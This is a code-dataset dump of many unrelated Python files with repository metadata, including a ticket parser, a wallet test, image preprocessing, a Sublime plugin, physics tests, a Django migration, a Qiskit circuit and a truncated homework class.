return [parse_rule(raw_rule) for raw_rule in raw_rules]
def parse_ticket(line):
return [int(i) for i in line.strip().split(',')]
def parse_my_ticket(instream):
it = dropwhile(lambda l: l.strip() == 'your ticket:', instream)
line = next(it).strip()
return parse_ticket(line), it
def parse_nearby_tickets(instream):
it = dropwhile(lambda l: not l.strip(), instream)
it2 = dropwhile(lambda l: l.strip() == 'nearby tickets:', it)
return [parse_ticket(line) for line in it2 if line.strip()]
def find_invalid_values(tickets, rules):
for t in tickets:
for v in t:
if not any([r.is_valid(v) for r in rules]):
yield v
def main():
rules = parse_rules(sys.stdin)
my_ticket, it = parse_my_ticket(sys.stdin)
nearby_tickets = parse_nearby_tickets(it)
invalid_values = find_invalid_values(nearby_tickets, rules)
print(sum(invalid_values))
if __name__ == '__main__':
main()
| [
"tomheon@gmail.com"
] | tomheon@gmail.com |
83892bf39e11723b6592e08710e80767f34d392a | bf80f309b6deb240be5fa82428ccffaedcb7ecf1 | /test/functional/wallet_disableprivatekeys.py | 71b4d7115620940c19e0c2d11d800254c7ca095a | [
"MIT"
] | permissive | danxb827/vektorcoin | b4677be9320de92a514d40eac213f51d1bc5e106 | be2a7adba6d00d1e378c969c77ea90daeecef9f7 | refs/heads/main | 2023-03-06T11:49:18.688978 | 2021-02-09T14:54:10 | 2021-02-09T14:54:10 | 336,577,132 | 1 | 1 | MIT | 2021-02-09T14:54:12 | 2021-02-06T16:05:36 | null | UTF-8 | Python | false | false | 1,275 | py | #!/usr/bin/env python3
# Copyright (c) 2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test disable-privatekeys mode.
"""
from test_framework.test_framework import VEKTORCOINTestFramework
from test_framework.util import (
assert_raises_rpc_error,
)
class DisablePrivateKeysTest(VEKTORCOINTestFramework):
def set_test_params(self):
self.setup_clean_chain = False
self.num_nodes = 1
self.supports_cli = True
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
node = self.nodes[0]
self.log.info("Test disableprivatekeys creation.")
self.nodes[0].createwallet('w1', True)
self.nodes[0].createwallet('w2')
w1 = node.get_wallet_rpc('w1')
w2 = node.get_wallet_rpc('w2')
assert_raises_rpc_error(-4,"Error: Private keys are disabled for this wallet", w1.getnewaddress)
assert_raises_rpc_error(-4,"Error: Private keys are disabled for this wallet", w1.getrawchangeaddress)
w1.importpubkey(w2.getaddressinfo(w2.getnewaddress())['pubkey'])
if __name__ == '__main__':
DisablePrivateKeysTest().main()
| [
"sourcedecho@outlook.com"
] | sourcedecho@outlook.com |
5d3fe22ea2528297fb0d306ace18125cb8d09444 | c46754b9600a12df4f9d7a6320dfc19aa96b1e1d | /examples/research_projects/lxmert/processing_image.py | 4343cfdbce846e9bf0a0cef33dbdde6e78f0ba8c | [
"Apache-2.0"
] | permissive | huggingface/transformers | ccd52a0d7c59e5f13205f32fd96f55743ebc8814 | 4fa0aff21ee083d0197a898cdf17ff476fae2ac3 | refs/heads/main | 2023-09-05T19:47:38.981127 | 2023-09-05T19:21:33 | 2023-09-05T19:21:33 | 155,220,641 | 102,193 | 22,284 | Apache-2.0 | 2023-09-14T20:44:49 | 2018-10-29T13:56:00 | Python | UTF-8 | Python | false | false | 5,747 | py | """
coding=utf-8
Copyright 2018, Antonio Mendoza Hao Tan, Mohit Bansal
Adapted From Facebook Inc, Detectron2
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.import copy
"""
import sys
from typing import Tuple
import numpy as np
import torch
from PIL import Image
from torch import nn
from transformers.image_utils import PILImageResampling
from utils import img_tensorize
class ResizeShortestEdge:
def __init__(self, short_edge_length, max_size=sys.maxsize):
"""
Args:
short_edge_length (list[min, max])
max_size (int): maximum allowed longest edge length.
"""
self.interp_method = "bilinear"
self.max_size = max_size
self.short_edge_length = short_edge_length
def __call__(self, imgs):
img_augs = []
for img in imgs:
h, w = img.shape[:2]
# later: provide list and randomly choose index for resize
size = np.random.randint(self.short_edge_length[0], self.short_edge_length[1] + 1)
if size == 0:
return img
scale = size * 1.0 / min(h, w)
if h < w:
newh, neww = size, scale * w
else:
newh, neww = scale * h, size
if max(newh, neww) > self.max_size:
scale = self.max_size * 1.0 / max(newh, neww)
newh = newh * scale
neww = neww * scale
neww = int(neww + 0.5)
newh = int(newh + 0.5)
if img.dtype == np.uint8:
pil_image = Image.fromarray(img)
pil_image = pil_image.resize((neww, newh), PILImageResampling.BILINEAR)
img = np.asarray(pil_image)
else:
img = img.permute(2, 0, 1).unsqueeze(0) # 3, 0, 1) # hw(c) -> nchw
img = nn.functional.interpolate(
img, (newh, neww), mode=self.interp_method, align_corners=False
).squeeze(0)
img_augs.append(img)
return img_augs
class Preprocess:
def __init__(self, cfg):
self.aug = ResizeShortestEdge([cfg.INPUT.MIN_SIZE_TEST, cfg.INPUT.MIN_SIZE_TEST], cfg.INPUT.MAX_SIZE_TEST)
self.input_format = cfg.INPUT.FORMAT
self.size_divisibility = cfg.SIZE_DIVISIBILITY
self.pad_value = cfg.PAD_VALUE
self.max_image_size = cfg.INPUT.MAX_SIZE_TEST
self.device = cfg.MODEL.DEVICE
self.pixel_std = torch.tensor(cfg.MODEL.PIXEL_STD).to(self.device).view(len(cfg.MODEL.PIXEL_STD), 1, 1)
self.pixel_mean = torch.tensor(cfg.MODEL.PIXEL_MEAN).to(self.device).view(len(cfg.MODEL.PIXEL_STD), 1, 1)
self.normalizer = lambda x: (x - self.pixel_mean) / self.pixel_std
def pad(self, images):
max_size = tuple(max(s) for s in zip(*[img.shape for img in images]))
image_sizes = [im.shape[-2:] for im in images]
images = [
nn.functional.pad(
im,
[0, max_size[-1] - size[1], 0, max_size[-2] - size[0]],
value=self.pad_value,
)
for size, im in zip(image_sizes, images)
]
return torch.stack(images), torch.tensor(image_sizes)
def __call__(self, images, single_image=False):
with torch.no_grad():
if not isinstance(images, list):
images = [images]
if single_image:
assert len(images) == 1
for i in range(len(images)):
if isinstance(images[i], torch.Tensor):
images.insert(i, images.pop(i).to(self.device).float())
elif not isinstance(images[i], torch.Tensor):
images.insert(
i,
torch.as_tensor(img_tensorize(images.pop(i), input_format=self.input_format))
.to(self.device)
.float(),
)
# resize smallest edge
raw_sizes = torch.tensor([im.shape[:2] for im in images])
images = self.aug(images)
# transpose images and convert to torch tensors
# images = [torch.as_tensor(i.astype("float32")).permute(2, 0, 1).to(self.device) for i in images]
# now normalize before pad to avoid useless arithmetic
images = [self.normalizer(x) for x in images]
# now pad them to do the following operations
images, sizes = self.pad(images)
# Normalize
if self.size_divisibility > 0:
raise NotImplementedError()
# pad
scales_yx = torch.true_divide(raw_sizes, sizes)
if single_image:
return images[0], sizes[0], scales_yx[0]
else:
return images, sizes, scales_yx
def _scale_box(boxes, scale_yx):
boxes[:, 0::2] *= scale_yx[:, 1]
boxes[:, 1::2] *= scale_yx[:, 0]
return boxes
def _clip_box(tensor, box_size: Tuple[int, int]):
assert torch.isfinite(tensor).all(), "Box tensor contains infinite or NaN!"
h, w = box_size
tensor[:, 0].clamp_(min=0, max=w)
tensor[:, 1].clamp_(min=0, max=h)
tensor[:, 2].clamp_(min=0, max=w)
tensor[:, 3].clamp_(min=0, max=h)
| [
"noreply@github.com"
] | huggingface.noreply@github.com |
513d127c57faca126f4109777231420faaaeaec5 | e71b6d14fbdbc57c7234ca45a47329d7d02fc6f7 | /flask_api/venv/lib/python3.7/site-packages/vsts/cloud_load_test/v4_1/models/test_drop_ref.py | b3b8c06b81e04f5cdadb22ea76c34dd594a80941 | [] | no_license | u-blavins/secret_sasquatch_society | c36993c738ab29a6a4879bfbeb78a5803f4f2a57 | 0214eadcdfa9b40254e331a6617c50b422212f4c | refs/heads/master | 2020-08-14T00:39:52.948272 | 2020-01-22T13:54:58 | 2020-01-22T13:54:58 | 215,058,646 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 999 | py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# Generated file, DO NOT EDIT
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------------------------
from msrest.serialization import Model
class TestDropRef(Model):
"""TestDropRef.
:param id:
:type id: str
:param url:
:type url: str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'}
}
def __init__(self, id=None, url=None):
super(TestDropRef, self).__init__()
self.id = id
self.url = url
| [
"usama.blavins1@gmail.com"
] | usama.blavins1@gmail.com |
72f28dbdfa4a58e7d3644a80084ca9459ef4cb7e | 2eb297cbb82d6a52fe8596dcf9a30a11b2f40f5b | /ui/input.py | 00f4078531853f8819177dea3216bd6918d46918 | [
"MIT"
] | permissive | martijndeb/sublime_db | 909cce11b038c05549c5337c1ef2d5847356fbc3 | 0d1cac7b87b32f843e65d8bee6583cadd5f9ea6a | refs/heads/master | 2023-04-18T12:36:20.218397 | 2019-04-25T14:32:05 | 2019-04-25T14:32:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,713 | py |
from sublime_db.core.typecheck import (
Any,
Callable,
Optional
)
import sublime
import sublime_plugin
from . import view_drag_select
command_id = 0
command_data = {}
sublime_command_visible = False
is_running_input = False
class SublimeDebugInputCommand(sublime_plugin.WindowCommand):
def run(self, command_id, **args):
global is_running_input
is_running_input = False
command_data[command_id][1](**args)
def input(self, args):
return command_data[args["command_id"]][0]
def is_visible(self):
return sublime_command_visible
def on_view_drag_select(event):
if is_running_input:
window = sublime.active_window()
window.run_command("hide_overlay", {
"overlay": "command_palette",
})
view_drag_select.add(on_view_drag_select)
def run_input_command(input, run, on_cancel = None):
global command_id
command_id += 1
current_command = command_id
command_data[current_command] = [input, run]
window = sublime.active_window()
def on_cancel_internal():
def cb():
# since we are async here we don't want to hide the panel if a new one was presented
if current_command == command_id:
window.run_command("hide_overlay", {
"overlay": "command_palette",
})
#when we do this while a command is closing it crashes sublime
sublime.set_timeout(cb, 0)
global is_running_input
is_running_input = False
input._on_cancel_internal = on_cancel_internal
if on_cancel:
input._on_cancel = on_cancel
def cb():
global sublime_command_visible
sublime_command_visible = True
window.run_command("hide_overlay", {
"overlay": "command_palette",
}
)
global is_running_input
is_running_input = True
window.run_command("show_overlay", {
"overlay": "command_palette",
"command": "sublime_debug_input",
"args": {
"command_id" : command_id
}
}
)
print('run command')
sublime_command_visible = False
sublime.set_timeout(cb, 0)
class TextInput(sublime_plugin.TextInputHandler):
def __init__(self, placeholder=None, initial=None, on_cancel=None, arg_name="text"):
super().__init__()
self._placeholder = placeholder
self._initial = initial
self.arg_name = arg_name
self._on_cancel = on_cancel
self._on_cancel_internal = None
def placeholder(self):
return self._placeholder
def initial_text(self):
return self._initial
def next_input(self, args):
return None
def name(self):
return self.arg_name
def cancel(self):
print('canceld')
if self._on_cancel_internal:
self._on_cancel_internal()
if self._on_cancel:
self._on_cancel()
class ListInputItem:
def __init__(self, text, name = None, next_input = None):
self.text = text
self.name = name
self.next_input = next_input
class ListInput(sublime_plugin.ListInputHandler):
def __init__(self, values, placeholder=None, index=0, on_cancel=None, arg_name="list"):
super().__init__()
self._next_input = None
self.values = values
self._placeholder = placeholder
self.index = index
self._on_cancel = on_cancel
self.arg_name = arg_name
self._on_cancel_internal = None
def name(self):
return self.arg_name
def placeholder(self):
return self._placeholder
def list_items(self):
items = []
for index, value in enumerate(self.values):
items.append([value.text, index])
return (items, self.index)
def confirm(self, value):
self._next_input = self.values[value].next_input
return value
def validate(self, value):
return True
def next_input(self, args):
return self._next_input
def cancel(self):
if self._on_cancel_internal:
self._on_cancel_internal()
if self._on_cancel:
self._on_cancel()
def description(self, value, text):
return self.values[value].name or self.values[value].text
| [
"2889367+daveleroy@users.noreply.github.com"
] | 2889367+daveleroy@users.noreply.github.com |
396ea058a84cb8b5082227faae609f9771c8e101 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_principals.py | 16f3fb65ff96b20997c351c44f1c60a775c5e89e | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 234 | py |
#calss header
class _PRINCIPALS():
def __init__(self,):
self.name = "PRINCIPALS"
self.definitions = principal
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['principal']
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
a66968d41f968900b87bb7951d047e994dad4c09 | ea393959886a5cd13da4539d634f2ca0bbcd06a2 | /25.py | bf36705e4f07d2004a75a4ce2f12358aab1d6d03 | [] | no_license | zhangchizju2012/LeetCode | f605f35b82f16282559af71e4e61ec2629a90ebc | 0c4c38849309124121b03cc0b4bf39071b5d1c8c | refs/heads/master | 2020-04-05T12:12:14.810639 | 2018-08-09T10:24:52 | 2018-08-09T10:24:52 | 81,021,830 | 7 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,779 | py | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Sat Jul 8 01:15:40 2017
@author: zhangchi
"""
# Definition for singly-linked list.
class ListNode(object):
def __init__(self, x):
self.val = x
self.next = None
class Solution(object):
# 粗粗地看了解法https://discuss.leetcode.com/topic/7126/short-but-recursive-java-code-with-comments
def reverseKGroup(self, head, k):
"""
:type head: ListNode
:type k: int
:rtype: ListNode
"""
cur = head
count = 0
while cur is not None and count < k:
cur = cur.next
count += 1
if count == k:
future = self.reverseKGroup(cur, k) # 后面的部分用recursion
count = 0
while count < k: # 调整前面k个node的顺序
node = head
head = head.next
node.next = future
future = node
count += 1
return future
else: # 长度不够的话不用调整顺序
return head
s = Solution()
print s.reverseKGroup()
#==============================================================================
#
#
# def helper(self, head):
# # 翻转整个链表
# result = None
# while head is not None:
# if result is None:
# result = head
# head = head.next
# result.next = None
# else:
# node = head
# head = head.next
# node.next = result
# result = node
# return result
#==============================================================================
| [
"zhangchizju2012@zju.edu.cn"
] | zhangchizju2012@zju.edu.cn |
6cb71d90adc94c50b55376b5146b6cc26ddb32d5 | 56f5b2ea36a2258b8ca21e2a3af9a5c7a9df3c6e | /CMGTools/H2TauTau/prod/25aug_corrMC/up/mc/SUSYGluGluToHToTauTau_M-140_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0_1377467520/HTT_24Jul_newTES_manzoni_Up_Jobs/Job_34/run_cfg.py | 4bc803d42d7d1aa922511e475adb6ea13772dc42 | [] | no_license | rmanzoni/HTT | 18e6b583f04c0a6ca10142d9da3dd4c850cddabc | a03b227073b2d4d8a2abe95367c014694588bf98 | refs/heads/master | 2016-09-06T05:55:52.602604 | 2014-02-20T16:35:34 | 2014-02-20T16:35:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,005 | py | import FWCore.ParameterSet.Config as cms
import os,sys
sys.path.append('/afs/cern.ch/user/m/manzoni/summer13/CMGTools/CMSSW_5_3_9/src/CMGTools/H2TauTau/prod/25aug_corrMC/up/mc/SUSYGluGluToHToTauTau_M-140_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0_1377467520/HTT_24Jul_newTES_manzoni_Up_Jobs')
from base_cfg import *
process.source = cms.Source("PoolSource",
noEventSort = cms.untracked.bool(True),
inputCommands = cms.untracked.vstring('keep *',
'drop cmgStructuredPFJets_cmgStructuredPFJetSel__PAT'),
duplicateCheckMode = cms.untracked.string('noDuplicateCheck'),
fileNames = cms.untracked.vstring('/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-140_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_99_1_WsI.root',
'/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-140_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_9_1_2xl.root')
)
| [
"riccardo.manzoni@cern.ch"
] | riccardo.manzoni@cern.ch |
664edc8cab885513f5ccd3738e50408ce10f11a2 | 10d17864a685c025bb77959545f74b797f1d6077 | /capitulo 09/09.25.py | 003c9c3b9fcfcc1cfd1681a56ca7483c17d12614 | [] | no_license | jcicerof/IntroducaoPython | 02178d2dfcaa014587edbd3090c517089ccef7c2 | 02e619c7c17e74acdc3268fbfae9ab624a3601dd | refs/heads/master | 2020-04-24T18:12:21.422079 | 2019-02-23T05:14:43 | 2019-02-23T05:14:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 709 | py | ##############################################################################
# Parte do livro Introdução à Programação com Python
# Autor: Nilo Ney Coutinho Menezes
# Editora Novatec (c) 2010-2019
# Primeira edição - Novembro/2010 - ISBN 978-85-7522-250-8
# Segunda edição - Junho/2014 - ISBN 978-85-7522-408-3
# Terceira edição - Janeiro/2019 - ISBN 978-85-7522-718-3
# Site: http://python.nilo.pro.br/
#
# Arquivo: listagem3\capítulo 09\09.25.py
# Descrição:
##############################################################################
import os
# Cria um arquivo e o fecha imediatamente
open("morimbundo.txt", "w").close()
os.mkdir("vago")
os.rmdir("vago")
os.remove("morimbundo.txt")
| [
"jose.cicero@gmail.com"
] | jose.cicero@gmail.com |
b885ba8f387ada4c7ad6cb63a67d0b8cf0c862d8 | 176839e6f94e593fb957f0af1bd5682c95e44f8f | /exoplanet/light_curves_test.py | be8699a85c7d2b5d7e809bde2bd08d05d2d5009e | [
"MIT"
] | permissive | Junjun1guo/exoplanet | 8a0a9d4deb351744a78db54801c4a9d9834e7f7a | 5df07b16cf7f8770f02fa53598ae3961021cfd0f | refs/heads/master | 2020-05-17T17:51:14.836055 | 2019-04-26T20:10:28 | 2019-04-26T20:10:28 | 183,867,012 | 2 | 0 | null | 2019-04-28T06:38:30 | 2019-04-28T06:38:30 | null | UTF-8 | Python | false | false | 3,522 | py | # -*- coding: utf-8 -*-
from __future__ import division, print_function
import numpy as np
import theano
import theano.tensor as tt
from theano.tests import unittest_tools as utt
import starry
from .orbits import KeplerianOrbit
from .light_curves import StarryLightCurve
def test_light_curve():
u = tt.vector()
b = tt.vector()
r = tt.vector()
lc = StarryLightCurve(u)
f = lc._compute_light_curve(b, r)
func = theano.function([u, b, r], f)
u_val = np.array([0.2, 0.3, 0.1, 0.5])
b_val = np.linspace(-1.5, 1.5, 100)
r_val = 0.1 + np.zeros_like(b_val)
m = starry.Map(lmax=len(u_val))
m[:] = u_val
expect = m.flux(xo=b_val, ro=r_val) - 1
evaluated = func(u_val, b_val, r_val)
utt.assert_allclose(expect, evaluated)
def test_light_curve_grad():
u_val = np.array([0.2, 0.3, 0.1, 0.5])
b_val = np.linspace(-1.5, 1.5, 20)
r_val = 0.1 + np.zeros_like(b_val)
lc = lambda u, b, r: StarryLightCurve(u)._compute_light_curve(b, r) # NOQA
utt.verify_grad(lc, [u_val, b_val, r_val])
def test_in_transit():
t = np.linspace(-20, 20, 1000)
m_planet = np.array([0.3, 0.5])
m_star = 1.45
orbit = KeplerianOrbit(
m_star=m_star,
r_star=1.5,
t0=np.array([0.5, 17.4]),
period=np.array([10.0, 5.3]),
ecc=np.array([0.1, 0.8]),
omega=np.array([0.5, 1.3]),
m_planet=m_planet,
)
u = np.array([0.2, 0.3, 0.1, 0.5])
r = np.array([0.1, 0.01])
lc = StarryLightCurve(u)
model1 = lc.get_light_curve(r=r, orbit=orbit, t=t)
model2 = lc.get_light_curve(r=r, orbit=orbit, t=t, use_in_transit=False)
vals = theano.function([], [model1, model2])()
utt.assert_allclose(*vals)
model1 = lc.get_light_curve(r=r, orbit=orbit, t=t, texp=0.1)
model2 = lc.get_light_curve(r=r, orbit=orbit, t=t, texp=0.1,
use_in_transit=False)
vals = theano.function([], [model1, model2])()
utt.assert_allclose(*vals)
def test_contact_bug():
orbit = KeplerianOrbit(period=3.456, ecc=0.6, omega=-1.5)
t = np.linspace(-0.1, 0.1, 1000)
u = [0.3, 0.2]
y1 = StarryLightCurve(u).get_light_curve(
orbit=orbit, r=0.1, t=t, texp=0.02).eval()
y2 = StarryLightCurve(u).get_light_curve(
orbit=orbit, r=0.1, t=t, texp=0.02, use_in_transit=False).eval()
assert np.allclose(y1, y2)
def test_small_star():
from batman.transitmodel import TransitModel, TransitParams
u_star = [0.2, 0.1]
r = 0.04221468
m_star = 0.151
r_star = 0.189
period = 0.4626413
t0 = 0.2
b = 0.5
ecc = 0.1
omega = 0.1
t = np.linspace(0, period, 500)
r_pl = r * r_star
orbit = KeplerianOrbit(
r_star=r_star, m_star=m_star,
period=period, t0=t0, b=b,
ecc=ecc, omega=omega)
a = orbit.a.eval()
incl = orbit.incl.eval()
lc = StarryLightCurve(u_star)
model1 = lc.get_light_curve(r=r_pl, orbit=orbit, t=t)
model2 = lc.get_light_curve(r=r_pl, orbit=orbit, t=t, use_in_transit=False)
vals = theano.function([], [model1, model2])()
utt.assert_allclose(*vals)
params = TransitParams()
params.t0 = t0
params.per = period
params.rp = r
params.a = a / r_star
params.inc = np.degrees(incl)
params.ecc = ecc
params.w = np.degrees(omega)
params.u = u_star
params.limb_dark = "quadratic"
model = TransitModel(params, t)
flux = model.light_curve(params)
utt.assert_allclose(vals[0][:, 0], flux - 1)
| [
"foreman.mackey@gmail.com"
] | foreman.mackey@gmail.com |
fefac4e918be7150dde77f0dc4af9eff39814d30 | 81357d11785eb03ec9abceb93e545e5fd9bcc156 | /tags/migrations/0001_initial.py | 96a74f82b4f97700d6efa346dfa4a211da721506 | [] | no_license | ytshaha/my-first-blog | f63dcc8372aac8cd0b1bfad47a67200b2b19772d | 7ee8c893e8c98cd0c290a1121b94f34110018525 | refs/heads/master | 2023-04-19T15:31:29.996220 | 2021-05-11T18:22:12 | 2021-05-11T18:22:12 | 328,199,497 | 0 | 0 | null | 2021-04-02T07:48:22 | 2021-01-09T16:39:27 | HTML | UTF-8 | Python | false | false | 804 | py | # Generated by Django 2.0.13 on 2021-02-06 05:46
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('products', '0009_auto_20210206_1411'),
]
operations = [
migrations.CreateModel(
name='Tag',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=120)),
('slug', models.SlugField()),
('timestamp', models.DateTimeField(auto_now_add=True)),
('active', models.BooleanField(default=True)),
('products', models.ManyToManyField(blank=True, to='products.Product')),
],
),
]
| [
"ytshaha@naver.com"
] | ytshaha@naver.com |
6fbbb3bc315903eca11f7f74467a6a187015f9b9 | 09e57dd1374713f06b70d7b37a580130d9bbab0d | /benchmark/startQiskit_noisy1712.py | 46f0c4c4192bdb4d1174a0955aa2b82bfb1f84e5 | [
"BSD-3-Clause"
] | permissive | UCLA-SEAL/QDiff | ad53650034897abb5941e74539e3aee8edb600ab | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | refs/heads/main | 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,594 | py | # qubit number=5
# total number=59
import cirq
import qiskit
from qiskit.providers.aer import QasmSimulator
from qiskit.test.mock import FakeVigo
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute, transpile
from pprint import pprint
from qiskit.test.mock import FakeVigo
from math import log2,floor, sqrt, pi
import numpy as np
import networkx as nx
def build_oracle(n: int, f) -> QuantumCircuit:
# implement the oracle O_f^\pm
# NOTE: use U1 gate (P gate) with \lambda = 180 ==> CZ gate
# or multi_control_Z_gate (issue #127)
controls = QuantumRegister(n, "ofc")
oracle = QuantumCircuit(controls, name="Zf")
for i in range(2 ** n):
rep = np.binary_repr(i, n)
if f(rep) == "1":
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.h(controls[n])
if n >= 2:
oracle.mcu1(pi, controls[1:], controls[0])
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.barrier()
return oracle
def make_circuit(n:int,f) -> QuantumCircuit:
    """Build a Grover-style search circuit on n qubits.

    Hadamards prepare a superposition, then floor(sqrt(2^n)*pi/4) iterations
    apply the oracle Zf followed by a (mutated) diffusion-like gate block.
    The ``# number=...`` tags are bookkeeping identifiers from the circuit
    generator; the exact gate order is significant and must not be changed.
    """
    # circuit begin
    input_qubit = QuantumRegister(n,"qc")
    classical = ClassicalRegister(n, "qm")
    prog = QuantumCircuit(input_qubit, classical)
    # Initial layer: Hadamards on all qubits (plus an injected rx rotation).
    prog.h(input_qubit[0]) # number=3
    prog.rx(-1.3603096190043806,input_qubit[2]) # number=28
    prog.h(input_qubit[1]) # number=4
    prog.h(input_qubit[2]) # number=5
    prog.h(input_qubit[3]) # number=6
    prog.h(input_qubit[4]) # number=21
    Zf = build_oracle(n, f)

    # Standard Grover iteration count: floor(pi/4 * sqrt(N)).
    repeat = floor(sqrt(2 ** n) * pi / 4)
    for i in range(repeat):
        # Oracle application followed by the diffusion-like block.
        prog.append(Zf.to_gate(), [input_qubit[i] for i in range(n)])
        prog.h(input_qubit[0]) # number=1
        prog.h(input_qubit[1]) # number=2
        prog.h(input_qubit[2]) # number=7
        prog.h(input_qubit[3]) # number=8
        prog.h(input_qubit[3]) # number=34
        prog.cz(input_qubit[4],input_qubit[3]) # number=35
        prog.h(input_qubit[3]) # number=36
        prog.h(input_qubit[0]) # number=38
        prog.cz(input_qubit[1],input_qubit[0]) # number=39
        prog.h(input_qubit[0]) # number=40
        prog.cx(input_qubit[1],input_qubit[0]) # number=56
        prog.x(input_qubit[0]) # number=57
        prog.cx(input_qubit[1],input_qubit[0]) # number=58
        prog.cx(input_qubit[1],input_qubit[0]) # number=33
        prog.cx(input_qubit[0],input_qubit[1]) # number=24
        prog.x(input_qubit[1]) # number=25
        prog.x(input_qubit[1]) # number=41
        prog.h(input_qubit[1]) # number=50
        prog.cz(input_qubit[0],input_qubit[1]) # number=51
        prog.h(input_qubit[1]) # number=52
        prog.x(input_qubit[2]) # number=11
        prog.cx(input_qubit[2],input_qubit[3]) # number=30
        prog.x(input_qubit[3]) # number=12
        prog.h(input_qubit[2]) # number=42

        # Multi-controlled phase at the heart of the diffusion operator.
        if n>=2:
            prog.mcu1(pi,input_qubit[1:],input_qubit[0])

        prog.x(input_qubit[0]) # number=13
        prog.x(input_qubit[1]) # number=14
        prog.x(input_qubit[2]) # number=15
        prog.x(input_qubit[4]) # number=46
        prog.x(input_qubit[3]) # number=16
        prog.h(input_qubit[0]) # number=17
        prog.h(input_qubit[1]) # number=18
        prog.h(input_qubit[2]) # number=53
        prog.cz(input_qubit[0],input_qubit[2]) # number=54
        prog.h(input_qubit[2]) # number=55
        prog.x(input_qubit[2]) # number=44
        prog.h(input_qubit[2]) # number=47
        prog.cz(input_qubit[0],input_qubit[2]) # number=48
        prog.h(input_qubit[2]) # number=49
        prog.rx(-1.9697785938008003,input_qubit[1]) # number=37
        prog.h(input_qubit[2]) # number=19
        prog.h(input_qubit[3]) # number=20
        prog.x(input_qubit[1]) # number=22
        prog.x(input_qubit[1]) # number=23
    # circuit end

    # Measure every work qubit into its classical bit.
    for i in range(n):
        prog.measure(input_qubit[i], classical[i])

    return prog
if __name__ == '__main__':
    # Oracle marks exactly the all-zeros bitstring.
    key = "00000"
    f = lambda rep: str(int(rep == key))
    prog = make_circuit(5, f)

    # Reuse one noisy fake backend for both execution and transpilation;
    # the original constructed FakeVigo() twice for no reason.
    backend = FakeVigo()
    sample_shot = 7924
    info = execute(prog, backend=backend, shots=sample_shot).result().get_counts()
    circuit1 = transpile(prog, backend, optimization_level=2)

    # Context manager guarantees the CSV is closed/flushed even if a
    # print raises (the original relied on a manual close()).
    with open("../data/startQiskit_noisy1712.csv", "w") as writefile:
        print(info, file=writefile)
        print("results end", file=writefile)
        print(circuit1.depth(), file=writefile)
        print(circuit1, file=writefile)
| [
"wangjiyuan123@yeah.net"
] | wangjiyuan123@yeah.net |
79d2fec2bf81ef4ccc513a92b42f779ce80f0a75 | f87f51ec4d9353bc3836e22ac4a944951f9c45c0 | /.history/HW10_20210724225915.py | 1e1595c2eeb3d376be15b9124994b1197d270cce | [] | no_license | sanjayMamidipaka/cs1301 | deaffee3847519eb85030d1bd82ae11e734bc1b7 | 9ddb66596497382d807673eba96853a17884d67b | refs/heads/main | 2023-06-25T04:52:28.153535 | 2021-07-26T16:42:44 | 2021-07-26T16:42:44 | 389,703,530 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,917 | py | """
Georgia Institute of Technology - CS1301
Homework 08 - Object Oriented Programming
"""
class Mario:
    """Player character tracking a name, lives, coins and alive status."""

    def __init__(self, name, lives, coins, isAlive):
        self.name = name        # display name
        self.lives = lives      # remaining lives
        self.coins = coins      # coin count
        self.isAlive = isAlive  # False once lives reach zero

    # the following method is provided to you
    def __eq__(self, other):
        return (self.name == other.name and
            self.lives == other.lives and
            self.coins == other.coins and
            self.isAlive == other.isAlive)

    # the following method is provided to you
    def __repr__(self):
        return f"Mario({self.name})"

    def gainCoins(self, numberOfCoins=5):
